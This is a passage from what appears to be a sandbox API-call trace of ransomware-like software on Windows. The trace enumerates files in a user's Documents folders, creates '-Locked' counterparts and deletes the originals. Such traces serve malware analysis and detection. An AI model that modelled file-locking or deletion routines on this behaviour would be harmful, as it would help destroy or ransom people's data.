lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.741] GetFileType (hFile=0x49c) returned 0x1 [0300.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.741] GetFileType (hFile=0x49c) returned 0x1 [0300.743] CloseHandle (hObject=0x49c) returned 1 [0300.743] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps", lpFilePart=0x0) returned 0x41 [0300.743] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\7yOeoNYz.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\7yoeonyz.pps")) returned 1 [0300.791] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods-Locked", lpFilePart=0x0) returned 0x4c [0300.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.791] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\wqmgowjrojyj.ods-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.791] GetFileType (hFile=0x49c) returned 0x1 [0300.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.791] GetFileType (hFile=0x49c) returned 0x1 [0300.793] CloseHandle (hObject=0x49c) returned 1 [0300.793] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods", lpFilePart=0x0) returned 0x45 [0300.793] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\wQMgowjROjyJ.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\wqmgowjrojyj.ods")) returned 1 [0300.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0300.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", lpFilePart=0x0) returned 0x46 [0300.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\", lpFilePart=0x0) returned 0x47 [0300.854] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.855] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.855] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc262b520, ftCreationTime.dwHighDateTime=0x1d7dd2b, ftLastAccessTime.dwLowDateTime=0xa69fb90, ftLastAccessTime.dwHighDateTime=0x1d7e40b, ftLastWriteTime.dwLowDateTime=0xa69fb90, ftLastWriteTime.dwHighDateTime=0x1d7e40b, nFileSizeHigh=0x0, nFileSizeLow=0x1dfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="-O2ryfCt-Z-rFQh4ejhz.pdf", cAlternateFileName="-O2RYF~1.PDF")) returned 1 [0300.855] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9bb5510, ftCreationTime.dwHighDateTime=0x1d7d85d, ftLastAccessTime.dwLowDateTime=0xdf380e00, ftLastAccessTime.dwHighDateTime=0x1d7e02a, ftLastWriteTime.dwLowDateTime=0xdf380e00, ftLastWriteTime.dwHighDateTime=0x1d7e02a, nFileSizeHigh=0x0, nFileSizeLow=0x57ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="7UxxQf.pptx", cAlternateFileName="7UXXQF~1.PPT")) returned 1 [0300.855] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x470138e0, ftCreationTime.dwHighDateTime=0x1d7d7d4, ftLastAccessTime.dwLowDateTime=0xa7edbea0, ftLastAccessTime.dwHighDateTime=0x1d7e178, ftLastWriteTime.dwLowDateTime=0xa7edbea0, ftLastWriteTime.dwHighDateTime=0x1d7e178, nFileSizeHigh=0x0, nFileSizeLow=0xec45, dwReserved0=0x0, dwReserved1=0x0, cFileName="FDP99THRlusTY51kF.doc", cAlternateFileName="FDP99T~1.DOC")) returned 1 [0300.855] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24abaa0, ftCreationTime.dwHighDateTime=0x1d7d776, ftLastAccessTime.dwLowDateTime=0xf78cb350, ftLastAccessTime.dwHighDateTime=0x1d7df50, ftLastWriteTime.dwLowDateTime=0xf78cb350, ftLastWriteTime.dwHighDateTime=0x1d7df50, nFileSizeHigh=0x0, nFileSizeLow=0x145aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ow6NE0vNNQjNDoJPgX.pps", cAlternateFileName="OW6NE0~1.PPS")) returned 1 [0300.856] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2523a0, ftCreationTime.dwHighDateTime=0x1d7e21a, ftLastAccessTime.dwLowDateTime=0xe36f150, ftLastAccessTime.dwHighDateTime=0x1d7e538, ftLastWriteTime.dwLowDateTime=0xe36f150, ftLastWriteTime.dwHighDateTime=0x1d7e538, nFileSizeHigh=0x0, nFileSizeLow=0x3ddb, dwReserved0=0x0, dwReserved1=0x0, cFileName="waV0uy0oji.odp", cAlternateFileName="WAV0UY~1.ODP")) returned 1 [0300.856] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.856] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0300.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0300.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0300.856] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", lpFilePart=0x0) returned 0x46 [0300.856] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\", lpFilePart=0x0) returned 0x47 [0300.856] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.857] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x154a9780, ftLastAccessTime.dwHighDateTime=0x1d7e3fd, ftLastWriteTime.dwLowDateTime=0x154a9780, ftLastWriteTime.dwHighDateTime=0x1d7e3fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.857] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc262b520, ftCreationTime.dwHighDateTime=0x1d7dd2b, ftLastAccessTime.dwLowDateTime=0xa69fb90, ftLastAccessTime.dwHighDateTime=0x1d7e40b, ftLastWriteTime.dwLowDateTime=0xa69fb90, ftLastWriteTime.dwHighDateTime=0x1d7e40b, nFileSizeHigh=0x0, nFileSizeLow=0x1dfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="-O2ryfCt-Z-rFQh4ejhz.pdf", cAlternateFileName="-O2RYF~1.PDF")) returned 1 [0300.857] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9bb5510, ftCreationTime.dwHighDateTime=0x1d7d85d, ftLastAccessTime.dwLowDateTime=0xdf380e00, ftLastAccessTime.dwHighDateTime=0x1d7e02a, ftLastWriteTime.dwLowDateTime=0xdf380e00, ftLastWriteTime.dwHighDateTime=0x1d7e02a, nFileSizeHigh=0x0, nFileSizeLow=0x57ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="7UxxQf.pptx", cAlternateFileName="7UXXQF~1.PPT")) returned 1 [0300.857] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x470138e0, ftCreationTime.dwHighDateTime=0x1d7d7d4, ftLastAccessTime.dwLowDateTime=0xa7edbea0, ftLastAccessTime.dwHighDateTime=0x1d7e178, ftLastWriteTime.dwLowDateTime=0xa7edbea0, ftLastWriteTime.dwHighDateTime=0x1d7e178, nFileSizeHigh=0x0, nFileSizeLow=0xec45, dwReserved0=0x0, dwReserved1=0x0, cFileName="FDP99THRlusTY51kF.doc", cAlternateFileName="FDP99T~1.DOC")) returned 1 [0300.858] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24abaa0, ftCreationTime.dwHighDateTime=0x1d7d776, ftLastAccessTime.dwLowDateTime=0xf78cb350, ftLastAccessTime.dwHighDateTime=0x1d7df50, ftLastWriteTime.dwLowDateTime=0xf78cb350, ftLastWriteTime.dwHighDateTime=0x1d7df50, nFileSizeHigh=0x0, nFileSizeLow=0x145aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ow6NE0vNNQjNDoJPgX.pps", cAlternateFileName="OW6NE0~1.PPS")) returned 1 [0300.858] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2523a0, ftCreationTime.dwHighDateTime=0x1d7e21a, ftLastAccessTime.dwLowDateTime=0xe36f150, ftLastAccessTime.dwHighDateTime=0x1d7e538, ftLastWriteTime.dwLowDateTime=0xe36f150, ftLastWriteTime.dwHighDateTime=0x1d7e538, nFileSizeHigh=0x0, nFileSizeLow=0x3ddb, dwReserved0=0x0, dwReserved1=0x0, cFileName="waV0uy0oji.odp", cAlternateFileName="WAV0UY~1.ODP")) returned 1 [0300.858] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2523a0, ftCreationTime.dwHighDateTime=0x1d7e21a, ftLastAccessTime.dwLowDateTime=0xe36f150, ftLastAccessTime.dwHighDateTime=0x1d7e538, ftLastWriteTime.dwLowDateTime=0xe36f150, ftLastWriteTime.dwHighDateTime=0x1d7e538, nFileSizeHigh=0x0, nFileSizeLow=0x3ddb, dwReserved0=0x0, dwReserved1=0x0, cFileName="waV0uy0oji.odp", cAlternateFileName="WAV0UY~1.ODP")) returned 0 [0300.858] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0300.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0300.859] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf-Locked", lpFilePart=0x0) returned 0x66 [0300.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0300.859] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\-o2ryfct-z-rfqh4ejhz.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.860] GetFileType (hFile=0x49c) returned 0x1 [0300.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0300.860] GetFileType (hFile=0x49c) returned 0x1 [0300.862] CloseHandle (hObject=0x49c) returned 1 [0300.862] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf", lpFilePart=0x0) returned 0x5f [0300.862] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\-O2ryfCt-Z-rFQh4ejhz.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\-o2ryfct-z-rfqh4ejhz.pdf")) returned 1 [0300.906] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx-Locked", lpFilePart=0x0) returned 0x59 [0300.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0300.906] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\7uxxqf.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.906] GetFileType (hFile=0x49c) returned 0x1 [0300.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0300.906] GetFileType (hFile=0x49c) returned 0x1 [0300.908] CloseHandle (hObject=0x49c) returned 1 [0300.908] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx", lpFilePart=0x0) returned 0x52 [0300.908] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\7UxxQf.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\7uxxqf.pptx")) returned 1 [0301.751] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc-Locked", lpFilePart=0x0) returned 0x63 [0301.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0301.751] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\fdp99thrlusty51kf.doc-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.752] GetFileType (hFile=0x49c) returned 0x1 [0301.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0301.752] GetFileType (hFile=0x49c) returned 0x1 [0301.774] CloseHandle (hObject=0x49c) returned 1 [0301.775] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc", lpFilePart=0x0) returned 0x5c [0301.775] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\FDP99THRlusTY51kF.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\fdp99thrlusty51kf.doc")) returned 1 [0301.785] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps-Locked", lpFilePart=0x0) returned 0x64 [0301.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0301.785] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\ow6ne0vnnqjndojpgx.pps-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.786] GetFileType (hFile=0x49c) returned 0x1 [0301.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0301.786] GetFileType (hFile=0x49c) returned 0x1 [0301.788] CloseHandle (hObject=0x49c) returned 1 [0301.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps", lpFilePart=0x0) returned 0x5d [0301.789] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\Ow6NE0vNNQjNDoJPgX.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\ow6ne0vnnqjndojpgx.pps")) returned 1 [0301.799] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp-Locked", lpFilePart=0x0) returned 0x5c [0301.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0301.799] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\wav0uy0oji.odp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.800] GetFileType (hFile=0x49c) returned 0x1 [0301.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0301.800] GetFileType (hFile=0x49c) returned 0x1 [0301.802] CloseHandle (hObject=0x49c) returned 1 [0301.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp", lpFilePart=0x0) returned 0x55 [0301.803] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG\\waV0uy0oji.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug\\wav0uy0oji.odp")) returned 1 [0301.836] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG", lpFilePart=0x0) returned 0x46 [0301.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0301.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ecbaf0, ftCreationTime.dwHighDateTime=0x1d7e243, ftLastAccessTime.dwLowDateTime=0x344e0902, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x344e0902, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0301.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0301.837] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Documents\\uuXtJUWZmGeM k7fGnf\\86tOlWarla8QzutUG" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uuxtjuwzmgem k7fgnf\\86tolwarla8qzutug")) returned 0 [0301.837] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0301.837] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0301.837] CoTaskMemFree (pv=0x73f0b8) [0301.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", 